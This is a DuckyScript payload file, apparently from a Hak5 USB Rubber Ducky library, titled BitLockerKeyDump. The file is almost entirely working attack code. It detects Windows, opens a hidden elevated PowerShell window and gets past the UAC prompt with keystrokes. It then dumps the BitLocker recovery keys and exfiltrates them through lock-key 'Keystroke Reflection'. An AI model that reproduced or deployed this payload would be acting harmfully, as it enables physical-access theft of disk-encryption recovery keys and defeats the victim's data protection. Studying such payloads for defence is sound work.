Path: blob/master/payloads/library/credentials/BitLockerKeyDump/payload.txt
2968 views
REM BitLockerKeyDump1REM Version 1.02REM OS: Windows3REM Author: 0i41E4REM Requirement: DuckyScript 3.05REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection67REM Extension made by Korben for checking if Target is Windows OS8EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT9REM VERSION 1.110REM AUTHOR: Korben1112REM_BLOCK DOCUMENTATION13Windows fully passive OS Detection and passive Detect Ready14Includes its own passive detect ready.15Does not require additional extensions.1617USAGE:18Extension runs inline (here)19Place at beginning of payload (besides ATTACKMODE) to act as dynamic20boot delay21$_OS will be set to WINDOWS or NOT_WINDOWS22See end of payload for usage within payload23END_REM2425REM CONFIGURATION:26DEFINE #MAX_WAIT 15027DEFINE #CHECK_INTERVAL 2028DEFINE #WINDOWS_HOST_REQUEST_COUNT 229DEFINE #NOT_WINDOWS 73031$_OS = #NOT_WINDOWS3233VAR $MAX_TRIES = #MAX_WAIT34WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))35DELAY #CHECK_INTERVAL36$MAX_TRIES = ($MAX_TRIES - 1)37END_WHILE38IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN39$_OS = WINDOWS40END_IF4142REM_BLOCK EXAMPLE USAGE AFTER EXTENSION43IF ($_OS == WINDOWS) THEN44STRING HELLO WINDOWS!45ELSE46STRING HELLO WORLD!47END_IF48END_REM49END_EXTENSION5051REM Extension made by 0i41E to signalize the payloads end52EXTENSION DETECT_FINISHED53REM VERSION 1.054REM AUTHOR: 0i41E5556REM_BLOCK DOCUMENTATION57USAGE:58Use the function Detect_Finished() to signal the finished execution of your payload.59END_REM6061REM CONFIGURATION:62DEFINE #PAUSE 15063FUNCTION Detect_Finished()64IF ($_CAPSLOCK_ON == FALSE)65CAPSLOCK66DELAY #PAUSE67CAPSLOCK68DELAY #PAUSE69CAPSLOCK70DELAY #PAUSE71CAPSLOCK72ATTACKMODE OFF73ELSE IF74CAPSLOCK75DELAY #PAUSE76CAPSLOCK77DELAY #PAUSE78CAPSLOCK79ATTACKMODE OFF80END_IF81END_FUNCTION82END_EXTENSION8384REM Extension made by 0i41E for fileless exfiltration via Lock Keys85EXTENSION WINDOWS_FILELESS_HID_EXFIL86REM VERSION 1.087REM AUTHOR: 0i41E8889REM_BLOCK DOCUMENTATION90Extension for Keystroke Reflection data exfiltration without putting files on disk.91This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.9293TARGET:94Windows Hosts that supports powershell and SendKeys9596USAGE:97Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.98It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.99100Example Usage:101GUI r102DELAY 500103STRINGLN powershell104DELAY 1000105STRING echo "This is my test"106Windows_Fileless_HID_Exfil()107END_REM108109FUNCTION Windows_Fileless_HID_Exfil()110DELAY 250111REM Saving current Keyboard lock keys112SAVE_HOST_KEYBOARD_LOCK_STATE113$_EXFIL_MODE_ENABLED = TRUE114$_EXFIL_LEDS_ENABLED = TRUE115DELAY 500116REM Setting the output as variable117STRING |Out-String|Set-Variable -Name "DD";118REM Converting output into Lock Key values119STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';120REM Exfiltrating via Keystroke Reflection121STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit122REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.123WAIT_FOR_SCROLL_CHANGE124LED_G125$_EXFIL_MODE_ENABLED = FALSE126RESTORE_HOST_KEYBOARD_LOCK_STATE127END_FUNCTION128END_EXTENSION129130REM Execution of "Yes" shortcut: ALT j (german), ALT y (english)131DEFINE #YES_SHORTCUT ALT j132133REM If Target is Windows, execute payload134IF ($_OS == WINDOWS) THEN135GUI r136DELAY 500137REM Opening hidden powershell and pressing CAPSLOCK as Administrator138STRING powershell -nop -c "Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait('{CAPSLOCK}');powershell.exe -nop -w h"139DELAY 250140CTRL-SHIFT ENTER141REM Rather long DELAY to increase reliability142DELAY 2000143REM Shortcut for pressing yes when UAC prompt appears144#YES_SHORTCUT145REM Check for CAPSLOCK change to see if execution as Admin was successful146WAIT_FOR_CAPS_CHANGE147DELAY 1500148REM Dumping recovery keys149STRING Get-BitLockerVolume|ForEach-Object{$drive = $_.MountPoint;$Key = [string]($_.KeyProtector).RecoveryPassword;if ($Key.Length -gt 5){Write-Output ("$drive Drive - Recovery Key: $Key")}}150REM Exfiltrating keys via Keystroke Reflection151Windows_Fileless_HID_Exfil()152DELAY 150153Detect_Finished()154REM If System is not Windows...155ELSE156DELAY 500157REM ... and CAPSLOCK is ON, open Storage...158IF ($_CAPSLOCK_ON == TRUE) THEN159ATTACKMODE STORAGE160REM ... If CAPSLOCK is OFF, stay in ATTACKMODE OFF161ELSE162LED_RED163DELAY 1000164LED_OFF165ATTACKMODE OFF166END_IF167END_IF168169170